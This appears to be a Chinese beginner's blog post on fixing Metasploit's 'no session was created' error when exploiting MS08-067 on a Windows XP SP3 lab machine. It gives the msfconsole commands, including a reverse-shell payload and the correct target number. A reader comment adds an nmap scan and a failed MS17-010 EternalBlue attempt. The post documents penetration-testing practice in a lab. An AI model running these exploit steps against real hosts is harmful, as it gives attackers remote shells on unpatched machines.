关于使用Metasploit中出现Exploit completed, but no session was created的解决办法

本文分享了一次利用MS08-067漏洞进行渗透测试的经历,详细记录了在攻击过程中遇到的问题及解决方案,包括正确设置目标靶机版本和语言的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

最近准备学习有关渗透测试方面的内容,记录一些自己遇见的问题与解决方法,大佬勿喷。

我在做第一个实验:利用ms08-067入侵靶机,获取控制权时,就遇见了下面这个问题:

Exploit completed, but no session was created

Exploit completed, but no session was created我先把我的命令行加上:

msf5 > use /windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RhOSTS 192.168.0.106
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/shell_reverse_tcp 
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 192.168.0.102
msf5 exploit(windows/smb/ms08_067_netapi) > exploit 

靶机系统为:Windows XP SP3 中文版

经过各方查阅,得出以下解决方法:

1.如果未设置targets,Metaexploit会使用默认的Exploit Target 0

   0   Automatic Targeting

此时要根据靶机版本选择合适的targets,例如这里是靶机系统为:Windows XP SP3 中文版,则只需加一行如下命令

msf5 exploit(windows/smb/ms08_067_netapi) > set target 34
target => 34

targets 34

然后输入exploit进行攻击即可

2.把靶机换成Windows XP英文版

结果:
已控制

鄙人刚刚学渗透,才疏学浅。有什么问题,或者我说的有什么错误大家可以在评论区指出。

msf6 exploit(windows/smb/ms17_010_eternalblue) > nmap -O 192.168.200.129 [*] exec: nmap -O 192.168.200.129 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-20 21:32 EDT Nmap scan report for 192.168.200.129 Host is up (0.00026s latency). Not shown: 992 closed tcp ports (reset) PORT STATE SERVICE 25/tcp open smtp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1433/tcp open ms-sql-s MAC Address: 00:0C:29:1B:D6:5A (VMware) Device type: general purpose Running: Microsoft Windows XP|2003 OS CPE: cpe:/o:microsoft:windows_xp::sp2:professional cpe:/o:microsoft:windows_server_2003 OS details: Microsoft Windows XP Professional SP2 or Windows Server 2003 Network Distance: 1 hop OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 2.32 seconds msf6 exploit(windows/smb/ms17_010_eternalblue) > set rport 445 rport => 445 msf6 exploit(windows/smb/ms17_010_eternalblue) > run [*] Started reverse TCP handler on 192.168.200.208:4444 [*] 192.168.200.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 192.168.200.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit) [*] 192.168.200.129:445 - Scanned 1 of 1 hosts (100% complete) [+] 192.168.200.129:445 - The target is vulnerable. [-] 192.168.200.129:445 - Exploit aborted due to failure: no-target: This module only supports x64 (64-bit) targets [*] Exploit completed, but no session was created.
03-22
评论 22
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值